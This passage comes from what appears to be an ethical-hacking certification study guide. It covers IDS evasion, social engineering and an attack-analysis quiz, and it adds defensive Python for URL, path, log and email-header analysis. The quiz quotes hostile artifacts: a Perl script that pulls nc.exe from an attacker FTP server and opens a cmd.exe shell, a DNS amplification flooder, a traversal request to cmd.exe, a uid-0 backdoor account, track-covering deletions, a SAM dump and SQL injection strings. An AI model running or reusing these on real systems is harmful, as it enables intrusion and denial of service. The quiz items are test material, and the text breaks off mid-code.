310. The OSX/Leap-A virus is a Mac OS X virus that spreads via iChat.
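An added example (not from the guide) for the canonicalization point of item 228 and the %255c traversal of item 309: decode the request path until it stops changing, fold backslashes, resolve it against the document root and only then check that it is still inside the root. A naive filter that looks for '..' after a single decode is shown beside it for contrast. The web root and sample paths are assumptions for the demonstration.

```python
# Added example, not from the study guide. WEBROOT and the request paths are
# constructed; the point is that the check runs on the canonical form.
import posixpath
from urllib.parse import unquote

WEBROOT = "/var/www"            # assumption: the server's document root


def decode_stages(path, max_rounds=4):
    """Successive percent-decodings until the string stops changing."""
    stages = [path]
    for _ in range(max_rounds):
        nxt = unquote(stages[-1])
        if nxt == stages[-1]:
            return stages
        stages.append(nxt)
    raise ValueError("too many encoding layers")


def fully_decode(path):
    return decode_stages(path)[-1]


def canonical_path(path):
    """Fully decoded, with backslashes folded to '/' (IIS treats both as
    separators, which is why ..%255c.. is a traversal)."""
    return fully_decode(path).replace("\\", "/")


def resolve(path, webroot=WEBROOT):
    """Map the canonical request path onto the filesystem."""
    rel = canonical_path(path).lstrip("/")
    return posixpath.normpath(posixpath.join(webroot, rel))


def is_safe(path, webroot=WEBROOT):
    """Check done on the canonical form: the resolved file must still be
    inside the web root."""
    full = resolve(path, webroot)
    return full == webroot or full.startswith(webroot + "/")


def naive_is_safe(path):
    """The bypassed pattern: decode once, then look for a '..' segment.
    '..%5c..' is not a '..' segment, so the double-encoded path passes."""
    once = unquote(path)
    return ".." not in once.split("/")
```

The Nimda request passes naive_is_safe because after one decode its segments read ..%5c.., which is not '..'; after the second decode and backslash folding the same request resolves to /winnt/system32/cmd.exe, outside the web root, and is_safe rejects it.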

Evading IDS, Firewalls, and Honeypots

311. To operate Snort in packet logger mode, type ./snort -dev -l ./log


312. Session splicing is when an attacker delivers the payload as a continuous stream of multiple small packets over a long period of time, with the purpose of defeating simple pattern matching in IDS systems that do not reconstruct the session.

313. Snort can operate as an IDS, packet logger, or sniffer.

314. The Send-Safe proxy server can be used to help evade honeypots.

315. Snort has great flexibility in creating rules. For example, the following rule alerts you whenever a TCP packet originating from any IP address is destined for any address on the 10.0.0.0/8 network on port 2222 (the guide omits the -> direction operator, which Snort requires):

alert tcp any any -> 10.0.0.0/8 2222

As another example, here is the rule to catch FTP root login attempts:

alert tcp any any -> any 21 (content:"user root"; nocase;)

316. A SOCKS proxy can be used to transparently connect through a firewall. SOCKS uses port 1080.

317. Obfuscation techniques include using non-standard ports or redirecting attempts to standard ports to a secure area that is logged.

318. Encrypting (and authenticating) communication between an agent and a monitor in an IDS is useful because the monitor can tell if counterfeit messages are being injected: they will not decrypt or verify correctly.

319. Firewalls cannot inspect encrypted traffic such as that used with SSL on port 443. SSL can be used to mask the contents of a packet and bypass intrusion detection systems, unless SSL is terminated and the traffic inspected in the clear.

320. A hacker can use Tor for anonymity on the Internet: traffic is relayed through a chain of volunteer nodes (onion routing), so no single node sees both the source and the destination.

321. Snort is a free, open source program that can be used to detect attacks such as port scans.

322. Fragroute is a tool that will craft (fragment, reorder, duplicate) packets to confuse pattern-matching IDSs.

323. A honeytoken is a fake document or record that is set up to see if employees are accessing unauthorized documents.

324. A covert channel is making use of a protocol in a way it was not intended to be used. It is a simple yet very effective mechanism for sending and receiving unauthorized information or data between machines without alerting any firewalls and IDSs on a network. This is sometimes called a network tunnel.

325. A host will still accept and reassemble TCP segments whose sequence numbers fall below that of a FIN segment it has already received (the FIN only marks the end of the byte stream). IDS evasion tools exploit this by sending the FIN early, expecting the IDS to stop tracking the session while the host continues to accept the remaining data.

326. A clue that your packets might be going through a stateful inspection firewall is that a traceroute shows the same IP address twice.

327. If web servers in a DMZ are responding to ACK packets on port 80, then chances are there is no stateful inspection firewall in use.


328. A false positive occurs when the IDS/IPS system classifies an action as anomalous when it is a legitimate action. A false negative occurs when an actual intrusive action has occurred but the system allows it to pass as non-intrusive behavior.

Social Engineering

329. You will need to enforce the corporate network security policy to resolve issues with employees bypassing the firewall by attaching a modem to their telephone line and workstations.

330. Social engineering can help you bypass a firewall. For example, you can create a web page that users can be lured into clicking on and, upon clicking, a keylogger can be embedded on their system.

331. Social engineering is the act of getting needed information from a person rather than breaking into a system.

332. An example of a phishing attack is when you receive an e-mail asking you to click

on a link that takes you to a different site than what is mentioned in the e-mail.

333. The current most common vehicle for social engineering attacks is e-mail.

334. Social engineering is easy and extremely effective method to gain information.

335. The best way to break into a highly secure system that is virtually impenetrable

is to use social engineering tactics like bribing employees with money to provide you

with sensitive information.

336. The weakest links in the security chain are untrained staff or ignorant computer

users who inadvertently become the weakest link in your security chain.

337. To determine the first octet of a DWORD encoded URL, divide the number by 16,777,216.

338. Another method of obfuscating URLs is to use hexadecimal equivalents. For example, 0xde = 222.
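Items 337 and 338 give the arithmetic by hand. The following Python decoder is an added example (editor's code, not part of this study guide) that turns the DWORD, hexadecimal and octal spellings of an IPv4 host back into dotted-decimal form, which is what a mail filter or log parser needs before it can compare a link target with a block list. It also separates the userinfo part of a URL, since a name placed before an "@" is a common way to make an obfuscated link look trustworthy. The sample links in it are constructed.

```python
from __future__ import annotations

from urllib.parse import urlsplit

DWORD_MAX = 2**32 - 1


def dword_to_ip(value: int) -> str:
    """Split a 32-bit DWORD into dotted-quad form.

    The first octet is value // 16,777,216 (2**24); the rest of the value is
    split the same way at 2**16 and 2**8.  The bit shifts below are that
    division done without the repeated arithmetic.
    """
    if not 0 <= value <= DWORD_MAX:
        raise ValueError(f"not a 32-bit value: {value}")
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def parse_number(token: str) -> int:
    """Parse a number written as decimal, 0x-prefixed hex or leading-zero
    octal, the three spellings browsers accept inside a host component."""
    if token[:2].lower() == "0x":
        return int(token[2:], 16)
    if len(token) > 1 and token[0] == "0":
        return int(token, 8)
    return int(token, 10)


def normalize_host(host: str) -> str:
    """Return the dotted-decimal form of an obfuscated IPv4 host.

    Accepts a single DWORD (decimal, hex or octal) or four dot-separated
    octets each written in any of those bases.  Anything that does not parse
    as a number is treated as an ordinary hostname and returned lower-cased.
    """
    parts = host.split(".")
    try:
        if len(parts) == 1:
            return dword_to_ip(parse_number(host))
        if len(parts) == 4:
            octets = [parse_number(p) for p in parts]
            if all(0 <= o <= 255 for o in octets):
                return ".".join(str(o) for o in octets)
    except ValueError:
        pass  # not numeric: fall through to the hostname case
    return host.lower()


def normalize_url(url: str) -> tuple[str, str | None]:
    """Return (canonical host, userinfo or None) for a link target.

    Deceptive links often put a trusted-looking name before an "@" so it is
    the first thing the reader sees; the real host is whatever follows the
    "@", so both parts are reported for the filter to act on.
    """
    parts = urlsplit(url)
    if parts.hostname is None:
        raise ValueError(f"no host in {url!r}")
    return normalize_host(parts.hostname), parts.username


if __name__ == "__main__":
    # Constructed sample links, not taken from any real phishing message.
    for link in ("http://3232235777/",
                 "http://www.example.com@0xC0A80101/login",
                 "http://0300.0250.01.01/",
                 "http://www.Example.com/"):
        print(link, "->", normalize_url(link))
```

normalize_host() handles the single-DWORD and four-part forms only; two- and three-part numeric hosts, which browsers also accept, are passed through unchanged, so a filter built on this should treat any all-numeric host it cannot canonicalize as suspicious rather than benign.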

339. The three stages of reverse social engineering are sabotage, advertising/marketing, and assisting.

Physical Security

340. Piggybacking (also called tailgating) is when someone walks in behind an authorized user to gain access into a building.

341. RFID tags are often used to manage inventory, but they can leak sensitive information, so they should be disabled when they are no longer needed. Use the kill switch built into RFID chips to disable tags once they are no longer needed.


Attack Analysis

Attack #1

#rm rootkit.c
#ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/port359 ? 00:00:00 inetd
#ps -aux | grep portmap
#ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/port359 00:00:00 inetd

What is the attacker trying to do?

A. Cover his/her tracks

B. Port scan

C. Escalate privileges

D. Man-in-the-middle attack

Attack #2

GET /msadc/…../…../…../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)..Host: lib.bvxttrip.org..Connection: Keep-Alive..Cookie: ASPSESSIONIDGQQQQQZU=KNOHEMW


What type of attack is being performed?

A. SQL injection

B. Firewalking

C. Directory Traversal

D. Cross-site scripting
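The request above reaches cmd.exe by walking up out of the web root with encoded separators. As an added example (editor's code, not from this guide), the Python below normalizes a request target the way a server-side filter or log reviewer would: it percent-decodes repeatedly, treats both slash and backslash as separators, and reports whether the resolved path ever climbs above the root. The sample targets are constructed; the first is modelled on the request shown above, with %5c standing for the backslash.

```python
from urllib.parse import unquote


def decode_path(raw: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so that a
    double-encoded %255c becomes %5c and then the backslash it stands for."""
    path = raw
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def traversal_check(request_target: str) -> dict:
    """Resolve '.' and '..' segments the way a file system would and report
    whether the request climbs above the web root.

    Both '/' and '\\' count as separators because IIS accepts either, and
    %5c is the encoded backslash.  The query string is ignored.
    """
    path = decode_path(request_target.split("?", 1)[0])
    depth = min_depth = 0
    resolved = []
    for segment in path.replace("\\", "/").split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            min_depth = min(min_depth, depth)
            if resolved:
                resolved.pop()
            continue
        depth += 1
        resolved.append(segment)
    return {
        "decoded": path,
        "normalized": "/" + "/".join(resolved),
        "min_depth": min_depth,          # how far below the root the path dipped
        "escapes_root": min_depth < 0,   # any dip below 0 means it left the root
    }


if __name__ == "__main__":
    # Constructed request targets modelled on the one above; %5c is "\".
    for target in ("/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir+c:\\",
                   "/images/../css/style.css",
                   "/%252e%252e/%252e%252e/etc/passwd"):
        print(target, "->", traversal_check(target))
```

The check is deliberately stricter than what a file system does: a path that dips below the root and comes back up (for example "/../www/index.html") still counts as an escape attempt, because no legitimate client composes a request that way.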

Attack #3

A screen pops up with the following message:

Message from SYSTEM to ALERT on 7/19/2005 6:00:03 PM

STOP! WINDOWS REQUIRES IMMEDIATE ATTENTION.

Windows has found Critical Errors.

To fix the errors please do the following:

1. Download Registry Repair from http://www.repairreg.com

2. Install Registry Repair

3. Run Registry Repair

4. Reboot your computer

FAILURE TO ACT NOW MAY LEAD TO DATA LOSS AND CORRUPTION

What could cause this message?

A. Windows messenger SPAM

B. MyDoom virus

C. Beast Trojan

D. Denial of Service attack


Attack #4

You receive 91 ICMP_ECHO packets within 90 minutes from 47 different sites. 77 of the ICMP_ECHO packets have ICMP ID: 39612 and Seq:57072. 13 of the ICMP_ECHO packets have ICMP ID:0 and Seq:0.

What does this mean?

A. Attacker is using NAT.

B. Attacker modified TCP/IP stack on the attacking system.

C. 77 packets are from a single subnet while 13 of the packets are from a different subnet.

D. ICMP ID and Sequence numbers are set by a tool and not the operating system.

Attack #5

Log entry:

1/19-13:22:01:44:812319 192.168.145.98:21 -> 200.100.50.25:4214 TCP

TTL:63 TOS:0x10 ID:11842 DF

What service is being exploited?

A. SMTP

B. FTP

C. WWW

D. SQL

Attack #6

mkdir -p /etc/X11/applnk/Internet/.etc
mkdir -p /etc/X11/appln/Internet/.etcpasswd
touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
passwd nobody -d
/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
passwd dns -d
touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
touch -acmr /etc/X11/applnk/Internet/.etc /etc

Is the attacker trying to change the password of an account?

How many accounts are being manipulated?

Is the attacker trying to change the password of an account?

How many accounts are being manipulated?

Attack #7

12/09-01:22:31.167035 207.219.240:1882 -> 172.16.1.104:21

TCP TTL:50 TOS:0x0 ID:53476 DF

*****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78

TCP Options => NOP NOP TS: 126045057 105803098

50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 PASS ……………….

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..

90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ………………………..


<OUTPUT OMITTED>

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882

TCP TTL: 63 TOS: 0x10 ID: 48231 DF

*****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78

TCP Options => NOP NOP TS: 105803113 126045057

35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login Incorr

65 63 74 2E 0D 0A etc…

Was the attacker successful?

Attack #8

############################################
$port = 53; # Spawn cmd.exe on port X
$your = "192.168.1.1"; # Your FTP server
$user = "Anonymous"; #login as
$pass = '[email protected]'; #password
############################################
$host = $ARGV[0];
print "Starting...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished .. (That's why it's good to have your own ftp server)\n";
$o=<STDIN>; print "Opening...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port"); exit(0);

What does this code do?

A. Creates a share called sasfile

B. Creates a backdoor account

C. Opens a telnet listener that requires no username or password

D. Creates a FTP server

Attack #9

use Net::DNS::Resolver;
use Net::RawIP;
open(LIST,"ns.list");
@list=<LIST>;
close LIST;
chomp(@list);
my $lnum=@list;
my $i=0;
my $loop=0;
if ($ARGV[0] eq '') {
print "Usage: ./hackme.pl <target IP> <loop count>\n";
exit(0);
}
while($loop < $ARGV[1]) {
while($i < $lnum) {
my $source = $ARGV[0];
my $dnspkt = new Net::DNS::Packet("google.com", "ANY");
my $pktdata = $dnspkt->data;
my $sock = new Net::RawIP({udp=>{}});
$sock->set({ip=> { saddr => $source, daddr => $list[$i],
frag_off=>0,tos=0,id=>1565, udp => {source => 53, dest => 53,
data=>$pktdata} });
$sock->send;
$i++;
}$loop++; $i=0;}
exit(0);

What type of attack is this?

A. DNS lookup attacks

B. DNS reflection and amplification attack

C. FTP DOS

D. FTP backdoor


Attack #10

C:\> cmd /c type c:\winnt\repair\sam > c:\file.txt

Volume in drive C has no label.

Volume Serial Number is 3105-51BF

Directory of C:\

3/14/04 04:12a 0 AUTOEXEC.BAT

3/14/04 8:01a 322 boot.ini

3/14/05 12:44p <DIR> WINNT

3/14/05 12:10p <DIR> TEMP

1,221,095,103 bytes free

C:\>type file.txt

C:\>copy file.txt c:\inetpub\wwwroot

C:\>GET file.txt HTTP/1.1

Server: Microsoft-IIS/4.0

Date: Sun, 04 Feb 2001 15:44:12 GMT

ETag: “9814ed8abc83103:8ff”

Content-Length: 5131

What is the hacker trying to steal?

A. file.txt

B. index.html

C. sam.txt

D. cmd.exe


Attack #11

Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

What type of attack is this?

A. Unsuccessful port scan

B. The hacker has a backdoor into the compromised system

C. A DNS poisoning attack

D. An unsuccessful WEP attack
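Alert logs like the one above are easier to judge when grouped by source and correlated with host logs. The Python below is an added example (editor's code, not from this guide) that parses the three line formats present in that log, lists the signatures each external address tripped, and pairs a shellcode-style alert against a host with any session opened on that host within a few minutes. The embedded sample lines are copied from the log above with the broken lines rejoined; the log year and the victim7 hostname-to-IP mapping are assumptions.

```python
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime, timedelta

# Syslog timestamps carry no year; the one used here is an assumption.
LOG_YEAR = 2001
# The PAM lines name the host and the Snort lines name the IP; this mapping
# is assumed for the sample and would come from inventory in practice.
HOST_TO_IP = {"victim7": "172.16.1.107"}

TS = r"(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d)"
ALERT_RE = re.compile(
    TS + r" \[\d+\]: (?P<sig>[^:]+): (?P<src>\d+\.\d+\.\d+\.\d+):\d+ -> "
         r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+)$")
PORTSCAN_RE = re.compile(
    TS + r" \[\d+\]: spp_portscan: portscan detected from (?P<src>\d+\.\d+\.\d+\.\d+)$",
    re.IGNORECASE)
SESSION_RE = re.compile(
    TS + r" (?P<host>\S+) PAM_pwdb\[\d+\]: \((?P<svc>\w+)\) session opened for user "
         r"(?P<user>\S+) by (?P<by>.*)$")
EXPLOIT_SIG = re.compile(r"nops|shellcode|overflow", re.IGNORECASE)

# Lines copied from the log above, with the extraction line breaks rejoined.
SAMPLE_LOG = """\
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
"""


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(f"{LOG_YEAR} {' '.join(ts.split())}", "%Y %b %d %H:%M:%S")


def parse_line(line: str) -> dict | None:
    """One log line to an event dict; None for formats this parser does not know."""
    if m := ALERT_RE.match(line):
        return {"kind": "alert", "ts": parse_ts(m["ts"]), "sig": m["sig"],
                "src": m["src"], "dst": m["dst"], "dport": int(m["dport"])}
    if m := PORTSCAN_RE.match(line):
        return {"kind": "portscan", "ts": parse_ts(m["ts"]), "sig": "spp_portscan",
                "src": m["src"], "dst": None, "dport": None}
    if m := SESSION_RE.match(line):
        return {"kind": "session", "ts": parse_ts(m["ts"]), "host": m["host"],
                "dst": HOST_TO_IP.get(m["host"]), "svc": m["svc"],
                "user": m["user"], "by": m["by"]}
    return None


def parse_log(log: str) -> list[dict]:
    return [e for e in map(parse_line, log.splitlines()) if e]


def alerts_by_source(events: list[dict]) -> dict[str, list[str]]:
    """Which signatures each external address tripped, in order."""
    by_src = defaultdict(list)
    for e in events:
        if e["kind"] in ("alert", "portscan"):
            by_src[e["src"]].append(e["sig"])
    return dict(by_src)


def exploit_followed_by_login(events: list[dict],
                              window: timedelta = timedelta(minutes=5)) -> list[dict]:
    """Pair a shellcode-style alert against a host with a session opened on
    that host shortly afterwards: the strongest sign in a log like this one
    that the exploit worked and someone is now using the access."""
    hits = []
    alerts = [e for e in events if e["kind"] == "alert" and EXPLOIT_SIG.search(e["sig"])]
    sessions = [e for e in events if e["kind"] == "session"]
    for a in alerts:
        for s in sessions:
            delay = s["ts"] - a["ts"]
            if s["dst"] == a["dst"] and timedelta(0) <= delay <= window:
                hits.append({"src": a["src"], "sig": a["sig"], "dst": a["dst"],
                             "svc": s["svc"], "user": s["user"],
                             "delay_s": int(delay.total_seconds())})
    return hits


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    for src, sigs in alerts_by_source(events).items():
        print(src, sigs)
    for hit in exploit_followed_by_login(events):
        print("possible compromise:", hit)
```

The correlation is what turns a noisy alert list into a finding: a version query, then a NOP-sled payload to the same DNS port from the same address, then a login session opened as root on the targeted host 80 seconds later. Any one of those alone is ambiguous; the sequence is not.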


Attack #12

Below is the e-mail header of a spoofed message found on the Internet. What is the IP address of the true source?

Return-Path: <[email protected]>
Received: from smtp.com (fw.emumail.com [215.52.220.122])
by raq-221-181.ev1.net (8.10.2/8.10.2) with ESMTP id h78NIn404807
for <[email protected]>; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000
Received: from ([19.25.19.10])
by smtp.com with SMTP
Received: from unknown (HELO CHRISLAPTOP) (168.150.84.123)
by localhost with SMTP; 8 Aug 2003 23:25:01 -0000
From: "Bill Gates" <[email protected]>
To: "mikeg" <[email protected]>
Subject: We need your help!
Date: Fri, 8 Aug 2003 19:12:28 -0400
Message-ID: <51.32.123.21@CHRISLAPTOP>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0052_01C35DE1.03202950"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
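Tracing the origin of a spoofed message means reading the Received: lines from the bottom up while checking that each relay's name reappears in the line above it. The Python below is an added example (editor's code, not from this guide) that does that with the standard library's email parser. Its sample message is constructed in the shape of the header above, using documentation address ranges rather than the addresses in the question.

```python
from __future__ import annotations

import re
from email import message_from_string

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
FROM_BY_RE = re.compile(r"\bfrom\s+(?P<from>.+?)\s+by\s+(?P<by>\S+)", re.DOTALL)

# Constructed headers in the shape of the ones above, using documentation
# address ranges; the names are placeholders, not a real message.
SAMPLE_MESSAGE = """\
Return-Path: <ceo@example.com>
Received: from relay.example (relay.example [203.0.113.10])
    by mx.victim.example (8.10.2/8.10.2) with ESMTP id h78NIn404807
    for <mikeg@victim.example>; Sat, 9 Aug 2003 18:18:50 -0500
Received: (qmail 12685 invoked from network); 8 Aug 2003 23:25:25 -0000
Received: from unknown (HELO CHRISLAPTOP) (198.51.100.77)
    by relay.example with SMTP; 8 Aug 2003 23:25:01 -0000
From: "Bill Gates" <billg@example.com>
To: "mikeg" <mikeg@victim.example>
Subject: We need your help!
Message-ID: <51.32.123.21@CHRISLAPTOP>

(body omitted)
"""


def received_hops(raw_message: str) -> list[dict]:
    """Received: headers top to bottom, i.e. most recent relay first.

    Each relay prepends its own line, so reading upward is reading forward
    in time.  A line with no 'from ... by ...' clause (such as a qmail queue
    stamp) is kept with ip=None so positions stay honest.
    """
    msg = message_from_string(raw_message)
    hops = []
    for value in msg.get_all("Received", []):
        text = " ".join(str(value).split())       # unfold continuation lines
        m = FROM_BY_RE.search(text)
        sender = m["from"] if m else None
        ip_match = IP_RE.search(sender) if sender else None
        hops.append({
            "from": sender,
            "by": m["by"] if m else None,
            "ip": ip_match.group(1) if ip_match else None,
            "from_unknown": bool(sender and sender.startswith("unknown")),
        })
    return hops


def chain_is_consistent(hops: list[dict]) -> bool:
    """Each relay's 'by' name should reappear in the 'from' clause of the
    line above it.  A break in that chain is where forged lines (which a
    sender can only place at the bottom) would show."""
    linked = [h for h in hops if h["from"] and h["by"]]
    return all(lower["by"] in upper["from"] for upper, lower in zip(linked, linked[1:]))


def originating_ip(raw_message: str) -> str | None:
    """Address recorded by the first relay that accepted the message: the
    bottom-most hop that carries an IP, trusted only as far as the chain
    above it checks out."""
    for hop in reversed(received_hops(raw_message)):
        if hop["ip"]:
            return hop["ip"]
    return None


if __name__ == "__main__":
    hops = received_hops(SAMPLE_MESSAGE)
    for hop in hops:
        print(hop)
    print("chain consistent:", chain_is_consistent(hops))
    print("originating IP:", originating_ip(SAMPLE_MESSAGE))
```

The From:, Date: and Message-ID: lines are written by the sender and prove nothing; only Received: lines added by relays you trust carry evidence, and "from unknown (HELO ...)" on the lowest hop means the first relay could not resolve the connecting address back to the name it announced.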

Attack #13

The following code is vulnerable to what type of attack?

<%
Set objConn = CreateObject("ADODB.Connection")
objConn.Open Application("WebUsersConnection")
sSQL="SELECT * FROM Users where Username='" & Request("user") & _
"' and Password='" & Request("pwd") & "'"
Set RS = objConn.Execute(sSQL)
If RS.EOF then
Response.Redirect("login.asp?msg=Invalid Login")
Else
Session.Authorized = True
Set RS = nothing
Set objConn = nothing
Response.Redirect("mainpage.asp")
End If
%>


Attack #14

Below is a partial hexdump of a packet. What version of Microsoft IIS is this web server?

000 00 00 BA 5E BA 11 00 A0 C9 B0 5E BD 08 00 45 00 ...^......^...E.

010 05 DC 1D E4 40 00 7F 06 C2 6D 0A 00 00 02 0A 00 [email protected]......

020 01 C9 00 50 07 75 05 D0 00 C0 04 AE 7D F5 50 10 ...P.u......}.P.

030 70 79 8F 27 00 00 48 54 54 50 2F 31 2E 31 20 32 py.'..HTTP/1.1.2

040 30 30 20 4F 4B 0D 0A 56 69 61 3A 20 31 2E 30 20 00.OK..Via:.1.0.

050 53 54 52 49 44 45 52 0D 0A 50 72 6F 78 79 2D 43 STRIDER..Proxy-C

060 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D onnection:.Keep-

070 41 6C 69 76 65 0D 0A 43 6F 6E 74 65 6E 74 2D 4C Alive..Content-L

080 65 6E 67 74 68 3A 20 32 39 36 37 34 0D 0A 43 6F ength:.29674..Co

090 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 ntent-Type:.text

0A0 2F 68 74 6D 6C 0D 0A 53 65 72 76 65 72 3A 20 4D /html..Server:.

0B0 69 63 72 6F 73 6F 66 74 2D 49 49 53 2F 34 2E 30 ..Microsoft

0C0 0D 0A 44 61 74 65 3A 20 53 75 6E 2C 20 32 35 20 ..Date:.Sun,.25.

0D0 4A 75 6C 20 31 39 39 39 20 32 31 3A 34 35 3A 35 Jul.1999.21:45:5

0E0 31 20 47 4D 54 0D 0A 41 63 63 65 70 74 2D 52 61 1.GMT..Accept-Ra

Attack #15

Below is a sample output of a web log. What type of attack is being performed here?

Attempted login of unknown user: johnm
Attempted login of unknown user: susaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete'';
Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x9062757944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
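The ASP code in Attack #13 and the web log in Attack #15 are two views of the same problem. The Python below is an added example (editor's code, not from this guide) that reproduces the vulnerable string-built query against an in-memory SQLite table, shows the parameterised form that defeats it, and picks the injection attempts out of the log lines above. The table contents are constructed; the log lines are copied from the question.

```python
import re
import sqlite3

# Log lines copied from the question above.
SAMPLE_LOG = """\
Attempted login of unknown user: johnm
Attempted login of unknown user: susaR
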